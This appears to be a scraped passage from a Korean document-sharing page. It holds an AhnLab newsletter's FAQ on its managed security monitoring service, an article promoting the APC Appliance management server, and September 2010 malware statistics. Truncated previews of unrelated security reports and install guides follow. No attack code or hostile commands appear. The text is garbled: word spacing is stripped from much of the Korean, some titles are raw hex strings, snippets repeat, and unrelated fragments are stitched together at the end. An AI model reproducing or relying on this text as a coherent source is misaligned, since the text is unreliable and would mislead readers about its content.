보안관제서비스를이용하는기업은다음과같은혜택을누릴수 있습니다. 예산, 인력, 조직운영의유연성보안관제서비스는서비스를이용한기간만큼만서비스요금을지불하는방식으로, 보안관제서비스를이용하는기업고객은보안시스템도입및운영에소요되는비용절감의효과를얻을수있습니다. 또한고객사의보안시스템운영을대신맡아주기때문에막중한보안관리업무에소요되던인력자원을보다유용하게활용할수있어기업의조직운영에부담이줄어듭니다. 핵심사업에대한집중력및경쟁력강화 IT보안 20년노하우를지닌신뢰할수있는국내최고의안철수연구소보안관제서비스에기업의보안시스템운영업무를위탁함으로써고객은안심하고기업의핵심비즈니스에더욱집중할수있습니다. 또한세상에서가장안전한이름안철수연구소와더불어대고객이미지향상을통해경쟁력을강화할수있습니다. 향상된침해대응능력안철수연구소보안관제서비스는최신의보안기술을습득한보안전문가집단에의해서제공됩니다. 이들보안전문가에의한보안관제서비스는다양한침해시도에신속하고정확하게대응하여고객의침해대응능력을향상시키는효과를가져다줍니다. 24시간 x 365 일보안업무지원체계안철수연구소보안관제서비스는 24시간 365 일항시제공되는서비스입니다. 고객은보안시스템운영에있어서발생하는문제들에대해서언제든지안철수연구소보안관제센터의지원을받으실수있습니다. 저희회사는자체적으로보안부서를운영하고있는데요, 그래도보안관제서비스를이용할필요가있을까요? 기업에서자체적으로보안담당자또는보안관련부서를운영하 고있는경우, 보안관제서비스를이용하면보다효율적이고향 상된보안업무수행결과를얻을수있습니다. 보안관제서비스 제공업체의정보파악과분석을통해기업의보안관련부서는 자사의실질적인보안이슈에관한의사결정에보다집중할수 있으며, 이러한고객의의사결정에기반해보안관제서비스제공 업체가고객사최적의보안시스템운영및침해대응역할을수 행하기때문입니다. 29

30 AhnLab Sefinity 보안관제서비스만의특 / 장점은무엇인가요? 국내최초로정보보안서비스를선보인선두기업인안철수연구소 는국내에서유일하게 CERT( 컴퓨터침해사고대응센터 ) 와 ASEC( 시 큐리티대응센터, AhnLab Security Emergency response Center) 을 동시에보유하고있어침해사고에대해신속하고정확한대응이 가능합니다. 또한 AhnLab Sefinity 보안관제서비스는 3P 전략을 통해안철수연구소만의차별화된보안관제서비스를제공하고있 습니다. Preventive( 사전예방활동 ) 안철수연구소보안관제서비스는 24 시간, 365 일상시모니터링과 점검활동으로고객사의침해사고및장애발생을사전에인지하 고대응하는데역점을두고있습니다. Proactive( 능동적보안활동 ) 국내외다양한분야의 350 여고객사를보유한안철수연구소의보 안관제서비스노하우를토대로학습에기반한상황주도적인능 동적보안서비스를제공합니다. Personalized( 개별화된서비스 ) 안철수연구소보안관제서비스는 24 시간, 365 일상시모니터링과 점검활동으로고객사의침해사고및장애발생을사전에인지하 고대응하는데역점을두고있습니다. AhnLab Sefinity 가제공하는보안관제서비스에는어떤것이있는지궁금합니다. AhnLab Sefinity 는 Firewall 관제, IDS/IPS 관제, UTM 관제서비스, Web Application Firewall 관제, DDoS 방어서비스, 전문가서비스 에이어최근에는기업보안관리자들이수행하기에는부담스러 운수준까지의모니터링및탐지를수행해주는 SiteCare 서비스 와 WebShell 탐지서비스를제공하고있습니다. 이외에도쾌적 한기업업무환경의필수요소라할수있는 Anti-Spam 서비스, Mail Security 서비스도제공하고있습니다. 취약점점검서비스 기업의네트워크, 시스템에존재하는보안취약점을심도있게 점검하고발견된취약점에대한대응방안을제공하는서비스입 니다. 취약점점검서비스를통해기업의네트워크, 시스템자체 의보안성이향상되어내외부의위협으로부터보다안전한 IT 서 비스운영이가능합니다. 침해사고대응서비스 침해사고발생시침해원인및침입경로를분석하여유사한침 해사고가재발하지않도록재발방지가이드를제공합니다. 모의해킹서비스 고객사의요청과협의에따라안철수연구소의보안전문가가기 업내외부의가상해커역할을수행하여기업의네트워크및시 스템을공격하는것으로, 기업의실질적인 IT 보안수준을측정하 고발견된문제에대한대응방안을제시하는서비스입니다. AhnLab Sefinity Portal 이란것도있던데요? AhnLab Sefinity Portal 은보안관제서비스고객에게제공되는포 털사이트입니다. 보안관제서비스고객은서비스개시시점부터 AhnLab Sefinity Portal 의계정을발급받아접속할수있으며, 이후 제공되는침입대응현황조회, 보안이벤트모니터링, 보안정책 및기술지원요청, 서비스보고서조회, 보안권고문등의보안정 보수신등보안관제서비스에관한모든사항을 AhnLab Sefinity Portal 을통해손쉽게확인하실수있습니다. AhnLab Sefinity 에대해더자세히알아보고싶은데요, 어떻게해야할까요? 안철수연구소는홈페이지를통해보안관제서비스 AhnLab Sefinity 는물론모든제품에대한상세한정보를제공하고있습니 다. 안철수연구소홈페이지안랩닷컴 ( 을방문하 시면 AhnLab Sefinity 에대한보다상세한정보를확인하실수있 습니다. 전문가서비스 (Professional Service) 라는것은무엇인가요? 안철수연구소의전문적이고숙련된보안전문가들이제공하는기업의네트워크, 시스템에대한취약점분석, 침해사고발생시의대응및모의해킹서비스등으로, 고객사에발생하거나발생할수있는침해시도에신속하고정확하게대응하여기업의보안환경향상에기여합니다. 30

31 NEW PRODUCT APC Appliance /11 보안관리와 TCO 절감을위한선택, APC Appliance 공공기관보안관리자김과장의고민은? 한정된예산안에서통합보안관리체계를효과적으로구축하는방법이없을까 A 공공기관의보안관리자인김과장. 그는최근깊은고민에빠져있다. 그가속해있는 A기관에새롭게 PC 보안제품을설치하고이에대한통합관리체계를구축하는프로젝트를진행하게된것. 그의고민은본사뿐만아니라전국지사에있는보안제품을중앙에서어떻게효과적으로관리할수있는가하는문제이다. 특히, 넉넉하지못한예산이가장큰걸림돌이다. A기관은서울본사를비롯해경기도, 제주도에 2곳의지사를두고있다. 전체직원수는서울에 2천여명, 경기도에 2천여명, 제주도에 1천여명등총 5천여명이다. 이에대한통합보안관리체계를구축하기위해서는 PC 통합보안제품과중앙관리솔루션을제외하고도서버, DB, OS 등의기본인프라가구축되어야한다. 최소한지사별로서버 3대와중앙의통합관리서버 1대등총 4대의서버가있어야한다. 또한 OS 사용권 4카피 (copy), DB 라이선스 4 카피등이필요하다. 그런데현재사용중인서버와 DB 벤더사의라이선스계약사항을확인해보니볼륨라이선스계약이체결되어있지않다. 그런경우클라이언트액세스라이선스 (Client Access License), 접속권계약을체결해야하는데그비용이엄청나다. 그뿐만아니라 OS 와 DB 사용권도별도로구매해야만한다. PC 통합보안제품과중앙관리솔루션도입을목적으로진행하는프로젝트인데이를사용할수있는인프라를갖추는비용이훨씬더많이드는셈이다. 김과장은예산과라이선스문제, 배포와설치문제, 앞으로의관리문제로인한골칫거리때문에머리가지끈거린다. 그는 " 난단지백신을설치하고싶을뿐이다 " 라고외치고싶은심정이다. 김과장의고민을해결해줄수있는방법은없을까. 그의고민은의외로간단하다. 전국에분포해있는지사의 PC 보안제품까지중앙에서한번에효과적으로관리하고자하는것이다. 그리고접속권문제로인해불법소프트웨어사용자가되지않고저렴한비용으로이를해결하고자하는것이다. 김과장을위해안철수연구소가제안하는솔루션은바로 APC(AhnLab Policy Center) Appliance 이다. <APC Appliance> 과거에비해기업의정보자산보호를위한인식이발전하면서이제대다수의기업들이보안장비와솔루션을도입, 이용하고있다. 그러나급격히증가하는악성코드와더불어공격양상또한급변함에따라개별 PC의보안제품설치뿐만아니라조직내 PC 보안에대한중앙관리가더욱어려워지고있다. 또한최근지적재산권침해에관한공공기관감사결과발표와더불어기업및기관에대한불법소프트웨어복제및사용에대한단속이강화될것이라는보도가이어지고있어효과적인보안환경구축과더불어비용문제가이슈가되고있다. 이와관련해안철수연구소는최근불법소프트웨어사용이슈가없는어플라이언스형태의중앙관리솔루션 AhnLab Policy Center Appliance 를출시했다. 어플라이언스형태의중앙관리솔루션 AhnLab Policy Center Appliance 2000/5000 은 V3 Internet Security 제품군과 V3Net for Windows Server 제품군을관리할수있는어플라이언스형태의중앙관리솔루션이다. AhnLab Policy Center Appliance( 이하 APC Appliance) 는기업보안정책에따른보안제품관리는물론바이러스확산방지를위한사전방역기능및자산관리와원격지원등데스크톱매니지먼트 (Desktop Management) 기능을통해기업내전체 PC에대한제어및기업내발생가능한보안위협에효과적으로대처할수있다. 특히전원연결후간단한환경설정만으로바로서비스를이용할수있는어플라이언스형태이기때문에설치의번거로움이나기다리는시간이대폭줄어들었다. 또한어플라이언스기반의최적화된성능과안정성을지원해편의성과더불어향상된안정성을제공한다. APC 4.0 과동일 Admin 및 Agent 를지원하기때문에기존고객의별도학습은필요하지않다. 31

32 접속권비용절감 OS 및 DBMS 비용절감대용량처리지원으로추가라이선스구매비용절감 유연하게적용할수있다. 아울러기존 APC 4.0 과마찬가지로기업내전산관리자의환경과사용자분석을통해작성된 UX(User experience) 설계를적용한모니터센터를제공해보안관리자들이한눈에기업내보안환경을파악할수있다. 이외에도전원및패치관리, 원격제어, NAC 등새롭게추가되거나기존 APC 4.0 에서향상된기능들이제공된다. 접속권비용지불시 TCO 라이선스이슈해소, 대용량관리지원으로 TCO 절감 최근지적재산권침해에관한공공기관감사결과발표와더불어 기업및기관에대한불법소프트웨어복제및사용에대한단속 이강화될것이라는보도가이어지고있어기업의보안환경과관 련해관리의효율성못지않게비용문제가이슈가되고있다. 특 히서버소프트웨어와관련해서는 ' 사용권 ' 과 ' 접속권 ' 이존재하는 경우가있는데, 이에대한인식이부족해자신도모르는사이에 불법소프트웨어사용자로전락하기쉽다. 서버소프트웨어 ' 사용권 ' 이란각각의서버소프트웨어사용에대 해요구되는유료라이선스다. 이와별도로서버소프트웨어 ' 접 속권 ' 이존재하는데, 이는서버소프트웨어로의접속에대한각각 의클라이언트컴퓨터에요구되는라이선스로, 사용권과는별도 의비용이발생한다. 즉, 서버소프트웨어에접속하는클라이언트 수가많아질수록 ' 접속권 ' 의비용이증가하게되는것이다. 그러나 현재국내상당수기업들과일부공공기관에서는이 ' 서버소프트 웨어접속권 ' 에대한인식이부족하기때문에추후라이선스비용 과관련한이슈가발생할가능성이제기되고있다. 그러나 APC Appliance 는라이선스비용이거의발생하지않는 Linux OS 및데이터베이스를지원해라이선스비용이슈를극소 화한다. 또한볼륨라이선스계약고객뿐만아니라볼륨라이선 스계약이없는일반고객의경우도추가적인비용절감이가능 하다. 아울러 APC Appliance 는서버 1 대당 2,000, 또는 5,000 User 까지대용량처리가가능해하드웨어및추가라이선스구 매비용의부담을줄여줌으로써기업의총소유비용 (Total Cost of Ownership, TCO) 절감의효과를가져온다. 안정성강화, 편의성향상 볼륨라이선스계약시 TCO <APC Appliance 도입에따른 TCO 절감효과 > APC Appliance 2000/5000 이용시 TCO 전용플랫폼기반의 APC Appliance 는 Raid 옵션지원을통해데 이터안정성을강화하고, TCP 기반의통신구조로데이터신뢰성 을극대화했다. 특히 H/W, S/W, OS, DB 에대한원스탑관리로보 안관리자의편의성을향상시켰다. 서버와에이전트간실시간정 보교환이이루어져통합도메인콘솔구조로전체도메인에대 한제어및정보취합이가능하다. 또한최대 5 단계상 / 하위서버 간실시간명령 / 정책수행을지원하기때문에기업환경에따라 TrusGuard 연동통한 NAC 기능 1) 자사네트워크보안제품인 AhnLab TrusGuard 와의연동을통한 Network Access Control(NAC) 기능제공 2) 에이전트미설치시, 외부인터넷접근을차단하고설치유도페이지로리디렉션 (Redirection), 악성코드에감염된시스템을격리하거나감염된 PC의바이러스검사수행향상된패치관리및원격관리 1) 관리자의별도작업없이온라인패치설정을통해자동으로패치적용가능 2) 에이전트설치본만들기의원격제어옵션에서선택한권한통제에따라원격제어접속제한가능보안솔루션중앙관리 1) 안철수연구소의 Client/Server 보안제품인 V3 Internet Security 제품군과 V3Net for Windows Server 제품군의중앙관리 2) 에이전트자동설치를통해설치된보안제품의정책설정 / 관리모니터센터 1) 에이전트현황, 보안제품설치현황, 엔진업데이트현황, 바이러스 / 스파이웨어감염 Top 5 등의현황제공 2) 문제인식후해결을위한명령전달까지한번에가능바이러스확산방지를위한사전방역기능 1) 취약한패스워드를가진관리자계정과취약공유폴더를주기적으로검사하여시스템취약성제거 2) 네트워크차단을통해악성프로그램의확산속도저하자산관리 1) 에이전트컴퓨터의하드웨어정보와소프트웨어설치정보조회 ( 수집 ) 서버관리자가선택한그룹 / 에이전트의최신자산정보조회 APC Appliance 는 Cost-effective( 총소유비용절감 ), Convenient( 관리및설치편의성 ), Care-free( 안정성강화 ) 의 3C 전략으로, 기업의안전한보안환경을구축하여기업정보자산보호및비즈니스의연속성확보는물론비용절감을통한기업경쟁력강화에도기여한다. 32

33 STATISTICS 2010 년 9 월악성코드관련주요통계 /11 스크립트 / 웜 / 바이러스는증가트로잔 / 애드웨어 / 스파이웨어는감소 9월의악성코드유형별감염보고비율은스크립트, 웜, 바이러스는전월에비해증가세를보이고있는반면트로잔, 애드웨어, 드롭퍼, 다운로더, 스파이웨어는감소한것으로나타났다. 또한 9월에등장한신종악성코드를유형별로살펴보면트로잔이 74% 로 1 위를차지하였으며애드웨어가 15% 로 2위, 웜이 7% 로 3위를각각차지하였다. [ 그림 4] 악성코드유형별배포수 [ 그림 1] 악성코드유형별감염보고전월비교 Trojan 74% Adware 15% Worm 7% [ 그림 2] 신종악성코드유형별분포 [ 그림 3] 월별악성코드가발견된 URL 9월에화제가되었던악성코드로는해킹된트위터계정을통해전파되는가짜트윗덱업데이트악성코드, 악성 html 파일을첨부한스팸메일, 다시나타나 9월내내피해를주고있는 ARP Spoofing 악성코드, 아이폰탈옥툴을위장한악성코드등이있다. 특히 ASEC Report Vol. 9에서는침해사이트케이스스터디로 'ARP Spoofing 과결합한Onlinegamehack 에대한악성코드 ' 의유포방식을다루었으며악성코드감염을위해사용된취약점, 이를예방하기위한방법등을제시하였다. 또한 Asec Report Vol.9 에서는올 3 분기의보안동향과이슈가되었던악성코드를되돌아보았다 년 3분기악성코드감염보고는 TextImage/Autorun 이 1위를차지하였으며 JS/Iframe 과 JS/Exploit 가각각 2위와 3위를차지하였다. 또한 2010 년 3분기의악성코드월별감염보고건수는 37,022,157 건으로 2010 년 2분기의악성코드월별감염보고건수 34,205,361 건에비해 2,816,796 건이증가하였다. 이외에도이번호에서는중국, 일본, 그외해외지역의 3분기악성코드동향에대해서도살펴보았으며최근 ASEC 에높은비중으로접수되고있는악성코드로 90 퍼센트이상중국에서제작된 Win-Trojan/StartPage 에대해심도있게살펴본칼럼 ' 중국산시작페이지고정형악성코드의배포방법및예방법 ' 도다루었다. 안철수연구소홈페이지 ( securitycenter/asec/asecreportview.do?groupcode=vni001) 를방문하면 ASEC Report 전문을볼수있다. [ 표 1] 악성코드유형별배포수 33

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷 인터넷비즈니스의안심코드, AhnLab Online Security 2.0 멀티브라우저지원! 블루투스키보드지원! 메모리해킹방어! 웹페이지변조및스크린캡처차단! 정보유출걱정없이비즈니스가완성됩니다 보안전용브라우저 AOS Secure Browser 키보드보안서비스 AOS anti-keylogger 온라인 PC 방화벽 AOS firewall 온라인통합방역서비스 AOS

More information

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

TGDPX white paper

TGDPX white paper White Paper DDoS 공격 대응의 새로운 패러다임 AhnLab TrusGuard DPX Revision Version: AhnLab TrusGuard DPX White Paper ver. 1.0 Release Date: April, 2010 AhnLab, Inc. 6th Fl., CCMM Bldg. 12 Yeouido-dong, Yeongdeungpo-gu,

More information

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770> 웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.

More information

354-437-4..

354-437-4.. 357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%

More information

AhnLab_template

AhnLab_template 2012 년상반기 악성코드동향과전망 - APT 2012. 10. 10 조시행연구소장 Contents 01 APT 02 최근 APT 공격사례 03 APT 공격형태의특징 04 미래 APT 공격형태 05 APT 공격대응방안 01 APT(Advanced Persistent Threat) 1) 2012 년도악성코드동향리뷰 2012 년 1 분기악성코드유형별피해분포 2012

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

5th-KOR-SANGFOR NGAF(CC)

5th-KOR-SANGFOR NGAF(CC) NGAF Firewall Platform 새로운 세상, 새로운 IT, 새로운 보안 SANGFOR 보안 개념 SAN GFO NGF W+ R NG AF WAF WAF 2010년대 IT산업이 급속하게 발전함에 따라 모든 애플리케이션과 서비스, 그리고 기기들은 BYOD, 사물인터넷(IoT), 클라우드 등과 같은 새로운 기술로 인터넷을 통해 연결되고 있습니다. 이는

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

#WI DNS DDoS 공격악성코드분석

#WI DNS DDoS 공격악성코드분석 #WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

개인정보보호의  이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호- 개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro

More information

Microsoft Word - src.doc

Microsoft Word - src.doc IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

SIGIL 완벽입문

SIGIL 완벽입문 누구나 만드는 전자책 SIGIL 을 이용해 전자책을 만들기 EPUB 전자책이 가지는 단점 EPUB이라는 포맷과 제일 많이 비교되는 포맷은 PDF라는 포맷 입니다. EPUB이 나오기 전까지 전 세계에서 가장 많이 사용되던 전자책 포맷이고, 아직도 많이 사 용되기 때문이기도 한며, 또한 PDF는 종이책 출력을 위해서도 사용되기 때문에 종이책 VS

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment

More information

Microsoft PowerPoint - chap01-C언어개요.pptx

Microsoft PowerPoint - chap01-C언어개요.pptx #include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 프로그래밍의 기본 개념을

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 (https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 2. 관련연구 2.1 MQTT 프로토콜 Fig. 1. Topic-based Publish/Subscribe Communication Model. Table 1. Delivery and Guarantee by MQTT QoS Level 2.1 MQTT-SN 프로토콜 Fig. 2. MQTT-SN

More information

[Brochure] KOR_TunA

[Brochure] KOR_TunA LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /

More information

wtu05_ÃÖÁ¾

wtu05_ÃÖÁ¾ 한 눈에 보는 이달의 주요 글로벌 IT 트렌드 IDG World Tech Update May C o n t e n t s Cover Story 아이패드, 태블릿 컴퓨팅 시대를 열다 Monthly News Brief 이달의 주요 글로벌 IT 뉴스 IDG Insight 개발자 관점에서 본 윈도우 폰 7 vs. 아이폰 클라우드 컴퓨팅, 불만 검증 단계 돌입 기업의

More information

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.

More information

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

